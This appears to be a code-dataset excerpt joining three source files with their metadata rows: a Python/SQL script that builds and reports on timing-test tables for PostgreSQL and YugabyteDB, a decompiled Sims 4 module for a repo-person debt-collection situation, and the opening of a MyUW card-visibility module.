    Notice that this sequence of separate SQL statements, separated by
    semi-colons, is effectively a ".sql" script. It could easily be turned
    into one, and trivial Python code could then read it into a single string
    value to be used, in turn, as the actual argument for "sess.execute()".
    Doing this would make the same reporting features available for use at the
    psql/ysqlsh prompt, to report on collected data in a single
    "timing_tests-times" table pair into which data from all runs, using both
    PG and YB, could be collected by appropriately mechanized use of
    "copy to" and "copy from".
    """
    # One multi-statement script, sent as a single execute() call.
    sess.execute("""
        drop function if exists timings_report() cascade;
        drop function if exists speed_ratio(text, text, int) cascade;
        drop view if exists speed_ratios_versus_nr_rows_per_txn cascade;
        drop view if exists avg_and_sddev_timings cascade;
        drop view if exists raw_timings cascade;
        drop table if exists times cascade;
        drop table if exists timing_tests cascade;
        drop table if exists timing_tests_pk_values cascade;
        create table timing_tests_pk_values(
          k int
            constraint timing_tests_pk_values_pk primary key,
          timing_tests_next_k int
            constraint timing_tests_pk_values_timing_tests_next_k_nn not null,
            constraint timing_tests_pk_values_timing_tests_next_k_chk check(timing_tests_next_k > 0),
          times_next_k int
            constraint timing_tests_pk_values_times_next_k_nn not null,
            constraint timing_tests_pk_values_times_next_k_chk check(times_next_k > 0));
        insert into timing_tests_pk_values(k, timing_tests_next_k, times_next_k)
        values (1, 1, 1 );
        create table timing_tests(
          k int
            constraint timing_tests_pk primary key,
          start_timestamp timestamp
            constraint timing_tests_start_timestamp_nn not null,
          db text
            constraint timing_tests_db_nn not null,
          approach text
            constraint timing_tests_approach_nn not null,
          mode text
            constraint timing_tests_mode_nn not null,
          method text
            constraint timing_tests_method_nn not null,
          nr_repeats int
            constraint timing_tests_nr_repeats_nn not null,
            constraint timing_tests_nr_repeats_chk check(nr_repeats > 0),
          nr_rows_per_txn int
            constraint timing_tests_nr_rows_per_txn_nn not null,
            constraint timing_tests_nr_rows_per_txn_chk check(nr_rows_per_txn > 0));
        create unique index timing_tests_db_method_nr_rows_per_txn_unq
        on timing_tests(db, method, nr_rows_per_txn);
        create table times(
          k int
            constraint times_pk primary key,
          timing_tests_k int
            constraint times_timing_tests_k_nn not null,
          this_timestamp timestamp
            constraint times_this_timestamp not null,
          measured_ms numeric
            constraint times_measured_ms_nn not null,
          constraint times_fk foreign key(timing_tests_k) references timing_tests(k));
        create view raw_timings as
        select
          t1.k as t1_k,
          t2.k as t2_k,
          t1.start_timestamp,
          t1.db,
          t1.approach,
          t1.mode,
          t1.method,
          t1.nr_repeats,
          t1.nr_rows_per_txn,
          t2.this_timestamp,
          t2.measured_ms
        from
          timing_tests as t1
          inner join times as t2 on t2.timing_tests_k = t1.k;
        create view avg_and_sddev_timings as
        select
          t1_k,
          start_timestamp,
          db,
          approach,
          mode,
          method,
          nr_repeats,
          nr_rows_per_txn,
          min(this_timestamp) as min_this_timestamp,
          max(this_timestamp) as max_this_timestamp,
          avg(measured_ms) as avg_measured_ms,
          stddev(measured_ms)::numeric as stddev_measured_ms,
          min(measured_ms) as min_measured_ms,
          max(measured_ms) as max_measured_ms
        from raw_timings
        group by
          t1_k, start_timestamp, db, approach, mode, method, nr_repeats, nr_rows_per_txn;
        create function speed_ratio(method_1 in text, method_2 in text, the_nr_rows_per_txn in int)
          returns table(nr_rows_per_txn int, speed_ratio numeric)
          immutable
          language sql
        as $body$
          select the_nr_rows_per_txn,
          (
            (
              select avg_measured_ms
              from avg_and_sddev_timings
              where method = method_1
              and nr_rows_per_txn = the_nr_rows_per_txn
            )
            /
            (
              select avg_measured_ms
              from avg_and_sddev_timings
              where method = method_2
              and nr_rows_per_txn = the_nr_rows_per_txn
            )
          );
        $body$;
        create view speed_ratios_versus_nr_rows_per_txn as
        select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 1)
        union all
        select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 2)
        union all
        select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 4)
        union all
        select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 8)
        union all
        select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 16)
        union all
        select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 32)
        union all
        select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 64)
        union all
        select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 128)
        union all
        select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 256)
        union all
        select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 512);
        create function timings_report()
          returns table(t text)
          immutable
          language plpgsql
        as $body$
        begin
          <<p>>declare
            db text not null := '';
            approach text not null := '';
            mode text not null := '';
            nr_repeats text not null := 0;
          begin
            select distinct a.db, a.approach, a.mode, ltrim(a.nr_repeats::text)
            into strict p.db, p.approach, p.mode, p.nr_repeats
            from avg_and_sddev_timings as a;
            approach :=
              case approach
                when 's' then 'single-table'
                when 'm' then 'many-tables'
              end;
            t := rpad('db:', 12)||db; return next;
            t := rpad('approach:' , 12)||approach; return next;
            t := rpad('mode:' , 12)||mode; return next;
            t := rpad('nr_repeats:', 12)||nr_repeats; return next;
          end p;
          t := ''; return next;
          <<q>>declare
            nr_rows_per_txn text not null := '';
            avg_measured_ms text not null := '';
            stddev_measured_ms text not null := '';
            min_measured_ms text not null := '';
            max_measured_ms text not null := '';
            n int not null := 0;
            methods constant text[] not null := array['sql', 'proc'];
            method text not null := '';
          begin
            t := 'method nr_rows_per_txn avg_measured_ms stddev_measured_ms min_measured_ms max_measured_ms';
            return next;
            t := '------ --------------- --------------- ------------------ --------------- ---------------';
            return next;
            foreach method in array methods loop
              n := 0;
              for
                q.nr_rows_per_txn,
                q.avg_measured_ms,
                q.stddev_measured_ms,
                q.min_measured_ms,
                q.max_measured_ms in (
                select
                  lpad(to_char(a.nr_rows_per_txn, '99999'), 17),
                  lpad(to_char(a.avg_measured_ms, '99990.99'), 15),
                  lpad(to_char(a.stddev_measured_ms, '99990.99'), 18),
                  lpad(to_char(a.min_measured_ms, '99990.99'), 15),
                  lpad(to_char(a.max_measured_ms, '99990.99'), 15)
                from avg_and_sddev_timings as a
                where a.method = q.method
                order by a.nr_rows_per_txn)
              loop
                n := n + 1;
                case n = 1
                  when true then
                    if method = 'proc' then
                      t := ''; return next;
                    end if;
                    t := rpad(method, 6)||nr_rows_per_txn||' '||avg_measured_ms||' '||stddev_measured_ms||' '||min_measured_ms||' '||max_measured_ms;
                  else
                    t := rpad(' ', 6)||nr_rows_per_txn||' '||avg_measured_ms||' '||stddev_measured_ms||' '||min_measured_ms||' '||max_measured_ms;
                end case;
                return next;
              end loop;
            end loop;
          end q;
          t := ''; return next;
          <<b>>declare
            nr_rows_per_txn text not null := '';
            speed_ratio text not null := '';
          begin
            t := 'nr_rows_per_txn speed_ratio'; return next;
            t := '--------------- -----------'; return next;
            for b.nr_rows_per_txn, b.speed_ratio in (
              select
                lpad(to_char(a.nr_rows_per_txn, '9999'), 15),
                lpad(to_char(a.speed_ratio, '990.99'), 11)
              from speed_ratios_versus_nr_rows_per_txn as a
              order by a.nr_rows_per_txn)
            loop
              t := nr_rows_per_txn||' '||speed_ratio; return next;
            end loop;
          end;
        end;
        $body$;
    """)
# ------------------------------------------------------------------------------------
def prepare_sqls(sess):
    """Run every PREPARE in Stmts once, so the EXECUTE statements can bind."""
    statements = (
        Stmts.prepare_select_timing_tests_next_k,
        Stmts.prepare_update_timing_tests_next_k,
        Stmts.prepare_insert_timing_tests,
        Stmts.prepare_select_times_next_k,
        Stmts.prepare_update_times_next_k,
        Stmts.prepare_insert_times,
    )
    for statement in statements:
        sess.execute(statement)
# ------------------------------------------------------------------------------------
class NrTxnsValues:
    """Powers-of-two transaction counts used by the timing tests, plus a
    pre-computed triangular-number checksum for each count.
    """

    @staticmethod
    def sum_1_though_n(n):
        """Return 1 + 2 + ... + n (the n-th triangular number).

        The original (misspelled) name is kept for backward compatibility;
        the O(n) accumulation loop is replaced by the closed form.
        """
        return n * (n + 1) // 2

    # Correctly spelled alias — the comment in __init__ (and external docs)
    # refer to "sum_1_through_n", which previously did not exist.
    sum_1_through_n = sum_1_though_n

    def __init__(self):
        # Populate with 1, 2, 4, ... 256, 512, i.e. 2**0 through 2**9.
        self.nr_txns_values = [2**j for j in range(10)]
        # The largest value doubles as the number of tables to create.
        self.nr_tables = self.nr_txns_values[-1]
        # Could have calculated the expected checksum on-demand, in
        # "single-table.py" and "many-tables.py" using this:
        #
        #   NTV.NrTxnsValues.sum_1_through_n(params.nr_rows_per_txn)
        #
        # But it's more stylish to use a dictionary of pre-computed values.
        self.checksums = {
            v: NrTxnsValues.sum_1_though_n(v) for v in self.nr_txns_values
        }
| 35.080645 | 151 | 0.561635 | 2,413 | 19,575 | 4.261915 | 0.148777 | 0.069525 | 0.048619 | 0.057176 | 0.444282 | 0.34296 | 0.309704 | 0.264586 | 0.220051 | 0.188643 | 0 | 0.014633 | 0.308761 | 19,575 | 557 | 152 | 35.143627 | 0.745399 | 0.097676 | 0 | 0.26009 | 0 | 0.013453 | 0.669356 | 0.088073 | 0 | 0 | 0 | 0 | 0.006726 | 1 | 0.029148 | false | 0 | 0.006726 | 0 | 0.089686 | 0.006726 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05d3c6388b962b0997a66cfe6c3d21cc7a096283 | 18,446 | py | Python | S4/S4 Library/simulation/situations/complex/repo_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | 1 | 2021-05-20T19:33:37.000Z | 2021-05-20T19:33:37.000Z | S4/S4 Library/simulation/situations/complex/repo_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | S4/S4 Library/simulation/situations/complex/repo_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | import enum
import operator
import random
from event_testing.resolver import SingleObjectResolver, SingleSimResolver
from event_testing.test_events import TestEvent
from event_testing.tests import TunableTestSet
from interactions.utils.outcome_enums import OutcomeResult
from interactions.utils.success_chance import SuccessChance
from sims.loan_tuning import LoanTunables
from sims4.localization import TunableLocalizedString
from sims4.tuning.instances import lock_instance_tunables
from sims4.tuning.tunable import TunableTuple, TunableInterval, TunablePercent, TunableList, OptionalTunable, TunableEnumEntry, Tunable, TunableRange
from sims4.tuning.tunable_base import GroupNames
from situations.bouncer.bouncer_types import BouncerExclusivityCategory
from situations.situation import Situation
from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, CommonInteractionCompletedSituationState, SituationStateData, TunableInteractionOfInterest, SituationState
from situations.situation_types import SituationCreationUIOption
from ui.ui_dialog_notification import UiDialogNotification
import services
import sims4.log
logger = sims4.log.Logger('RepoSituation', default_owner='nsavalani')
# Where the debt being collected lives (and therefore where a repossession
# payment is deducted from).
class DebtSource(enum.Int):
    # Decompiled source: the original tuned integer values were lost and
    # appear as Ellipsis placeholders — do not rely on the numeric values.
    # (enum.Int is the game's extension of the stdlib enum module.)
    SCHOOL_LOAN = ...
    BILLS = ...
class _WaitForRepoPersonState(SituationState):
    # Initial state: nothing to do until both the repo-person and the debtor
    # sim have been added; RepoSituation._on_add_sim_to_situation then moves
    # the situation into the find-object state.
    pass
class _FindObjectState(CommonSituationState):
    """Pop candidate objects (cheapest delta first) until one that is not
    currently in use is found; idle at it, or leave-path via the
    nothing-to-take state when the queue is exhausted."""

    def on_activate(self, reader=None):
        super().on_activate(reader=reader)
        chosen = None
        queue = self.owner.objects_to_take
        while queue:
            candidate_id = queue.pop(0)[0]
            candidate = services.object_manager().get(candidate_id)
            if not candidate.self_or_part_in_use:
                chosen = candidate
                break
        if chosen is None:
            self._change_state(self.owner.nothing_to_take_state())
        else:
            self.owner.set_current_object(chosen)
            self._change_state(self.owner.idle_at_object_state())

    def timer_expired(self):
        self._change_state(self.owner.leave_state())
class _NothingToTakeState(CommonInteractionCompletedSituationState):
    """No valid object remains to repossess; the repo-person leaves either
    when the interaction of interest completes or when the state times out."""

    def _go_to_leave(self):
        # Shared exit path for both triggers below.
        self._change_state(self.owner.leave_state())

    def _on_interaction_of_interest_complete(self, resolver=None, **kwargs):
        self._go_to_leave()

    def timer_expired(self):
        self._go_to_leave()
class _IdleAtObjectState(CommonSituationState):
    # The repo-person idles near the chosen object.  While here the player
    # can bribe them (they leave without taking anything) or plead with them
    # ("ask not to take"); when the state timer expires the object is
    # repossessed.
    # NOTE(review): branch nesting below was reconstructed from decompiled,
    # whitespace-stripped source — confirm against the original game data.

    def on_activate(self, reader=None):
        super().on_activate(reader=reader)
        # Listen for completion of both tunable interactions of interest.
        for custom_key in self.owner.bribe_interaction.custom_keys_gen():
            self._test_event_register(TestEvent.InteractionComplete, custom_key)
        for custom_key in self.owner.ask_not_to_take_interaction.custom_keys_gen():
            self._test_event_register(TestEvent.InteractionComplete, custom_key)

    def handle_event(self, sim_info, event, resolver):
        repo_person = self.owner.repo_person()
        # Only react to interaction completions performed by the repo-person.
        if event == TestEvent.InteractionComplete and repo_person is not None and sim_info is repo_person.sim_info:
            if resolver(self.owner.bribe_interaction):
                # Successful bribe: spare the current object and leave the lot.
                if resolver.interaction.global_outcome_result == OutcomeResult.SUCCESS:
                    self.owner.clear_current_object()
                    self._change_state(self.owner.leave_state())
            elif resolver(self.owner.ask_not_to_take_interaction):
                # Each plea consumes one tuned success chance; once the list
                # is exhausted, further pleas always fail (chance 0).
                if self.owner.ask_not_to_take_success_chances_list:
                    ask_not_to_take_chance = self.owner.ask_not_to_take_success_chances_list.pop(0).get_chance(resolver)
                else:
                    ask_not_to_take_chance = 0
                if random.random() < ask_not_to_take_chance:
                    # Plea succeeded: release this object, optionally show a
                    # TNS, then go pick another target.
                    self.owner.clear_current_object()
                    if self.owner.ask_not_to_take_success_notification is not None:
                        notification = self.owner.ask_not_to_take_success_notification(repo_person.sim_info, resolver=SingleSimResolver(repo_person.sim_info))
                        notification.show_dialog()
                    self._change_state(self.owner.find_object_state())
                elif self.owner.ask_not_to_take_failure_notification is not None:
                    # Plea failed: optionally show a TNS; stay in this state
                    # until the timer triggers repossession.
                    notification = self.owner.ask_not_to_take_failure_notification(repo_person.sim_info, resolver=SingleSimResolver(repo_person.sim_info))
                    notification.show_dialog()

    def timer_expired(self):
        # Timed out without a successful bribe/plea: take the object.
        self._change_state(self.owner.repossess_object_state())
class _RepossessObjectState(CommonInteractionCompletedSituationState):
    # The repo-person takes the current object.  Order matters below:
    # reduce_debt must read current_object's value before it is cleared.

    def _on_interaction_of_interest_complete(self, resolver=None, **kwargs):
        self.owner.reduce_debt(self.owner.current_object.depreciated_value)
        self.owner.clear_current_object()
        # Decides whether to find another object or leave the lot.
        self.owner.on_object_repossessed()

    def timer_expired(self):
        # Repossession interaction never completed; try another object.
        self._change_state(self.owner.find_object_state())
class _LeaveState(CommonSituationState):
    """Terminal state: force the repo-person off the lot (if still present)
    and tear the situation down."""

    def on_activate(self, reader=None):
        super().on_activate(reader)
        leaving_sim = self.owner.repo_person()
        if leaving_sim is not None:
            situation_manager = services.get_zone_situation_manager()
            situation_manager.make_sim_leave_now_must_run(leaving_sim)
        self.owner._self_destruct()
class RepoSituation(SituationComplexCommon):
INSTANCE_TUNABLES = {'repo_person_job_and_role_state': TunableSituationJobAndRoleState(description='\n The job and role state for the repo-person.\n ', tuning_group=GroupNames.ROLES), 'debtor_sim_job_and_role_state': TunableSituationJobAndRoleState(description='\n The job and role state for the Sim from the active household whose\n unpaid debt is being collected by the repo-person.\n ', tuning_group=GroupNames.ROLES), 'repo_amount': TunableTuple(description='\n Tuning that determines the simoleon amount the repo-person is\n trying to collect.\n ', target_amount=TunablePercent(description='\n The percentage of current debt which determines the base\n amount the repo-person will try to collect.\n ', default=10), min_and_max_collection_range=TunableInterval(description='\n Multipliers that define the range around the target amount\n that determine which objects should be taken.\n ', tunable_type=float, default_lower=1, default_upper=1), tuning_group=GroupNames.SITUATION), 'save_lock_tooltip': TunableLocalizedString(description='\n The tooltip to show when the player tries to save the game while\n this situation is running. The save is locked when the situation\n starts.\n ', tuning_group=GroupNames.SITUATION), 'find_object_state': _FindObjectState.TunableFactory(description='\n The state that picks an object for the repo-person to take.\n ', display_name='1. Find Object State', tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP), 'nothing_to_take_state': _NothingToTakeState.TunableFactory(description='\n The state at which there is nothing for the repo-person to take.\n ', display_name='2. Nothing To Take State', tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP), 'idle_at_object_state': _IdleAtObjectState.TunableFactory(description='\n The state at which the repo-person waits near the picked object\n and can be asked not to take the object.\n ', display_name='3. 
Idle At Object State', tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP), 'repossess_object_state': _RepossessObjectState.TunableFactory(description='\n The state at which the repo-person will repossess the picked object.\n ', display_name='4. Repossess Object State', tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP), 'leave_state': _LeaveState.TunableFactory(description='\n The state at which the repo-person leaves the lot.\n ', display_name='5. Leave State', tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP), 'valid_object_tests': TunableTestSet(description='\n Test set that determines if an object on the lot is valid for\n repossession.\n ', tuning_group=GroupNames.SITUATION), 'ask_not_to_take_success_chances': TunableList(description='\n List of values that determine the chance of success of the ask\n not to take interaction, with each chance being used once and then\n moving to the next. After using all the tuned chances the next\n ask not to take interaction will always fail.\n ', tunable=SuccessChance.TunableFactory(description='\n Chance of success of the "Ask Not To Take" interaction.\n '), tuning_group=GroupNames.SITUATION), 'bribe_interaction': TunableInteractionOfInterest(description='\n If this interaction completes successfully, the repo-person will\n leave the lot without repossessing anything.\n '), 'ask_not_to_take_interaction': TunableInteractionOfInterest(description='\n When this interaction completes, the situation will determine if\n the repo-person should find another object to repossess or not\n based on the tuned success chances.\n '), 'ask_not_to_take_failure_notification': OptionalTunable(description='\n A TNS that displays when an ask-not-to-take interaction fails, if enabled.\n ', tunable=UiDialogNotification.TunableFactory()), 'ask_not_to_take_success_notification': OptionalTunable(description='\n A TNS that displays when an ask-not-to-take interaction succeeds, if enabled.\n ', 
tunable=UiDialogNotification.TunableFactory()), 'debt_source': TunableEnumEntry(description="\n The source of where the debt is coming from and where it'll be removed.\n ", tunable_type=DebtSource, default=DebtSource.SCHOOL_LOAN), 'maximum_object_to_repossess': OptionalTunable(description='\n The total maximum objects that the situation will take.\n ', tunable=TunableRange(description='\n The total maximum objects that the situation will take.\n If Use Debt Amount is specified then the situation will keep taking objects\n until there are no more valid objects to take or we have removed all of the\n debt.\n ', tunable_type=int, default=1, minimum=1), enabled_by_default=True, enabled_name='has_maximum_value', disabled_name='use_debt_amount'), 'auto_clear_debt_event': OptionalTunable(description='\n If enabled then we will have an even we listen to to cancel the debt.\n ', tunable=TunableEnumEntry(description='\n The event that when triggered will cause all the debt to be cancelled and the\n repo man to leave.\n ', tunable_type=TestEvent, default=TestEvent.Invalid, invalid_enums=(TestEvent.Invalid,)))}
REMOVE_INSTANCE_TUNABLES = Situation.NON_USER_FACING_REMOVE_INSTANCE_TUNABLES
def __init__(self, *args, **kwargs):
    super().__init__(*args, **kwargs)
    # (object_id, value_delta) pairs, cheapest delta first once cached.
    self.objects_to_take = []
    # Object currently targeted for repossession (reserved while set).
    self.current_object = None
    # Working copy of the tuned plea chances; consumed one per plea.
    self.ask_not_to_take_success_chances_list = list(self.ask_not_to_take_success_chances)
    # Reservation on current_object, released in clear_current_object().
    self._reservation_handler = None
    # Count of objects taken so far, compared against the tuned maximum.
    self._objects_repossessed = 0
@classmethod
def _states(cls):
    # State-machine registry for this situation.
    # NOTE(review): the numeric ids presumably must stay stable for
    # save/load — confirm against situation_complex conventions.
    return (SituationStateData(1, _WaitForRepoPersonState), SituationStateData(2, _FindObjectState, factory=cls.find_object_state), SituationStateData(3, _NothingToTakeState, factory=cls.nothing_to_take_state), SituationStateData(4, _IdleAtObjectState, factory=cls.idle_at_object_state), SituationStateData(5, _RepossessObjectState, factory=cls.repossess_object_state), SituationStateData(6, _LeaveState, factory=cls.leave_state))
@classmethod
def _get_tuned_job_and_default_role_state_tuples(cls):
    # The two participants: the repo-person and the debtor household sim.
    return [(cls.repo_person_job_and_role_state.job, cls.repo_person_job_and_role_state.role_state), (cls.debtor_sim_job_and_role_state.job, cls.debtor_sim_job_and_role_state.role_state)]
@classmethod
def default_job(cls):
    # Deliberately no default job for this situation.
    pass
def repo_person(self):
    """Return the repo-person sim, or None when not yet spawned."""
    return next(self.all_sims_in_job_gen(self.repo_person_job_and_role_state.job), None)
def debtor_sim(self):
    """Return the debtor sim from the active household, or None."""
    return next(self.all_sims_in_job_gen(self.debtor_sim_job_and_role_state.job), None)
def _cache_valid_objects(self):
    """Populate self.objects_to_take with (object id, |value - target|)
    pairs, sorted so the object closest in value to the collection target
    comes first.  Self-destructs the situation when no debt value can be
    determined.
    """
    debt_value = self.get_debt_value()
    if debt_value is None:
        # Unknown/unhandled debt source: nothing to collect.
        self._self_destruct()
        return
    # Base collection target is a tuned percentage of the current debt.
    target_amount = debt_value*self.repo_amount.target_amount
    unsorted = []
    plex_service = services.get_plex_service()
    # In apartments, objects in common areas are not eligible.
    check_common_area = plex_service.is_active_zone_a_plex()
    debtor_household_id = self.debtor_sim().household_id
    for obj in services.object_manager().valid_objects():
        # Only the debtor household's own objects can be repossessed.
        if not obj.get_household_owner_id() == debtor_household_id:
            continue
        if not obj.is_on_active_lot():
            continue
        if check_common_area and plex_service.get_plex_zone_at_position(obj.position, obj.level) is None:
            continue
        # Repo-person must be able to route to the object.
        if not obj.is_connected(self.repo_person()):
            continue
        # Skip objects with children (e.g. things placed on top of them).
        if obj.children:
            continue
        resolver = SingleObjectResolver(obj)
        if self.valid_object_tests.run_tests(resolver):
            delta = abs(obj.depreciated_value - target_amount)
            unsorted.append((obj.id, delta))
    self.objects_to_take = sorted(unsorted, key=operator.itemgetter(1))
def _on_add_sim_to_situation(self, sim, job_type, role_state_type_override=None):
    super()._on_add_sim_to_situation(sim, job_type, role_state_type_override=role_state_type_override)
    # Kick off the state machine only once both participants are present.
    if self.debtor_sim() is not None and self.repo_person() is not None:
        self._cache_valid_objects()
        self._change_state(self.find_object_state())
def _destroy(self):
    super()._destroy()
    # Release any outstanding object reservation, the save lock taken in
    # start_situation(), and the optional auto-clear-debt event listener.
    self.clear_current_object()
    services.get_persistence_service().unlock_save(self)
    if self.auto_clear_debt_event is not None:
        services.get_event_manager().unregister_single_event(self, self.auto_clear_debt_event)
def start_situation(self):
    # Saving is locked for the whole situation (tooltip comes from
    # get_lock_save_reason); the lock is released in _destroy().
    services.get_persistence_service().lock_save(self)
    super().start_situation()
    self._change_state(_WaitForRepoPersonState())
    # Optionally listen for an event that cancels the debt outright.
    if self.auto_clear_debt_event is not None:
        services.get_event_manager().register_single_event(self, self.auto_clear_debt_event)
def handle_event(self, sim_info, event, resolver):
    """When the tuned auto-clear-debt event fires, wipe the debt and send
    the repo-person away."""
    super().handle_event(sim_info, event, resolver)
    trigger = self.auto_clear_debt_event
    if trigger is not None and event == trigger:
        self.clear_debt()
        self._change_state(self.leave_state())
def reduce_debt(self, amount):
    """Subtract *amount* simoleons from the tracked debt.

    SCHOOL_LOAN debt lives on the host sim's loan-debt statistic; BILLS
    debt lives on the active household's bills manager.  Silently a no-op
    when the loan statistic does not exist.
    """
    if self.debt_source == DebtSource.SCHOOL_LOAN:
        host_sim_info = services.sim_info_manager().get(self._guest_list.host_sim_id)
        statistic = host_sim_info.get_statistic(LoanTunables.DEBT_STATISTIC, add=False)
        # No statistic means no loan to reduce; flattened from the original
        # redundant "if None: return / else:" structure.
        if statistic is not None:
            statistic.add_value(-amount)
    elif self.debt_source == DebtSource.BILLS:
        services.active_household().bills_manager.reduce_amount_owed(amount)
    else:
        # Bug fix: include the offending source in the message, matching
        # the sibling clear_debt() error log.
        logger.error('Attempting to use a debt source {} that is not handled', self.debt_source, owner='jjacobson')
def clear_debt(self):
    # Zero out the tracked debt entirely (used by the auto-clear-debt
    # event path in handle_event).
    if self.debt_source == DebtSource.SCHOOL_LOAN:
        host_sim_info = services.sim_info_manager().get(self._guest_list.host_sim_id)
        statistic = host_sim_info.get_statistic(LoanTunables.DEBT_STATISTIC, add=False)
        if statistic is None:
            # No loan statistic: nothing to clear.
            return
        else:
            statistic.set_value(0)
    elif self.debt_source == DebtSource.BILLS:
        services.active_household().bills_manager.pay_bill(clear_bill=True)
    else:
        logger.error('Attempting to use a debt source {} that is not handled', self.debt_source, owner='jjacobson')
        return
def get_debt_value(self):
    """Return the outstanding debt amount, or None when it cannot be
    determined (missing loan statistic / unhandled source).  Callers treat
    None as "nothing to collect" (see _cache_valid_objects).
    """
    if self.debt_source == DebtSource.SCHOOL_LOAN:
        host_sim_info = services.sim_info_manager().get(self._guest_list.host_sim_id)
        statistic = host_sim_info.get_statistic(LoanTunables.DEBT_STATISTIC, add=False)
        if statistic is None:
            return
        return statistic.get_value()
    if self.debt_source == DebtSource.BILLS:
        return services.active_household().bills_manager.current_payment_owed
    else:
        logger.error('Attempting to use a debt source that is not handled', owner='jjacobson')
        return
def on_object_repossessed(self):
    self._objects_repossessed += 1
    # Keep taking objects while under the tuned maximum (None means
    # "keep going until the debt is gone") and debt remains; otherwise
    # send the repo-person away.
    if self.maximum_object_to_repossess is None or self._objects_repossessed < self.maximum_object_to_repossess:
        debt_value = self.get_debt_value()
        if debt_value is not None and debt_value > 0:
            self._change_state(self.find_object_state())
            return
    self._change_state(self.leave_state())
def get_target_object(self):
    # Current repossession target (None between targets).
    return self.current_object
def get_lock_save_reason(self):
    # Tooltip shown when the player tries to save while this runs.
    return self.save_lock_tooltip
def set_current_object(self, obj):
    self.current_object = obj
    if self._reservation_handler is not None:
        # Shouldn't happen: clear_current_object() should have released
        # the previous reservation.  Recover by ending it first.
        logger.error('Trying to reserve an object when an existing reservation already exists: {}', self._reservation_handler)
        self._reservation_handler.end_reservation()
    # Reserve the target for the repo-person so other sims can't use it.
    self._reservation_handler = self.current_object.get_reservation_handler(self.repo_person())
    self._reservation_handler.begin_reservation()
def clear_current_object(self):
    """Drop the repossession target and release its reservation, if any."""
    self.current_object = None
    handler = self._reservation_handler
    if handler is not None:
        handler.end_reservation()
        self._reservation_handler = None
lock_instance_tunables(RepoSituation, exclusivity=BouncerExclusivityCategory.NORMAL, creation_ui_option=SituationCreationUIOption.NOT_AVAILABLE) | 68.572491 | 5,764 | 0.710181 | 2,283 | 18,446 | 5.440648 | 0.154183 | 0.016424 | 0.016665 | 0.020288 | 0.450044 | 0.406731 | 0.376218 | 0.303035 | 0.256099 | 0.225505 | 0 | 0.002208 | 0.214464 | 18,446 | 269 | 5,765 | 68.572491 | 0.855003 | 0 | 0 | 0.385281 | 0 | 0.051948 | 0.215916 | 0.015179 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125541 | false | 0.008658 | 0.08658 | 0.017316 | 0.337662 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05d5af4312e21f1f9ab8d022d2b76d516a33aa34 | 9,461 | py | Python | myuw/dao/card_display_dates.py | uw-it-aca/myuw | 3fa1fabeb3c09d81a049f7c1a8c94092d612438a | [
"Apache-2.0"
] | 18 | 2015-02-04T01:09:11.000Z | 2021-11-25T03:10:39.000Z | myuw/dao/card_display_dates.py | uw-it-aca/myuw | 3fa1fabeb3c09d81a049f7c1a8c94092d612438a | [
"Apache-2.0"
] | 2,323 | 2015-01-15T19:45:10.000Z | 2022-03-21T19:57:06.000Z | myuw/dao/card_display_dates.py | uw-it-aca/myuw | 3fa1fabeb3c09d81a049f7c1a8c94092d612438a | [
"Apache-2.0"
] | 9 | 2015-01-15T19:29:26.000Z | 2022-02-11T04:51:23.000Z | # Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
"""
Generates the booleans to determine card visibility,
based on dates in either the current, next, or previous term.
https://docs.google.com/document/d/14q26auOLPU34KFtkUmC_bkoo5dAwegRzgpwmZEQMhaU
"""
import logging
import traceback
from datetime import datetime, timedelta
from myuw.dao import log_err
from myuw.dao.term import get_comparison_datetime,\
get_current_quarter, get_next_quarter, get_previous_quarter,\
get_term_after, is_in_summer_quarter,\
is_in_summer_b_term, get_bod_current_term_class_start,\
get_eod_current_term_last_instruction, get_bod_7d_before_last_instruction,\
get_eod_7d_after_class_start, get_eod_current_term_last_final_exam
from myuw.dao.term import get_bod_class_start_quarter_after as\
get_bod_quarter_after
from myuw.dao.iasystem import in_coursevel_fetch_window
logger = logging.getLogger(__name__)
def in_show_grades_period(term, request):
    """True while the comparison time is still before the first day of the
    quarter after *term* (i.e. grades for *term* are still shown)."""
    if term is None or request is None:
        return False
    return get_comparison_datetime(request) < get_bod_quarter_after(term)
def get_card_visibilty_date_values(request=None):
    """Return the dict of card-visibility booleans for the request's
    comparison time.  ("visibilty" misspelling kept: public API name.)
    """
    values = get_values_by_date(get_comparison_datetime(request),
                                request)
    # Session-based overrides let tests/devtools force specific flags.
    set_js_overrides(request, values)
    return values
def get_values_by_date(now, request):
    """
    now is a datetime object of 1 second after the beginning of the day.
    """
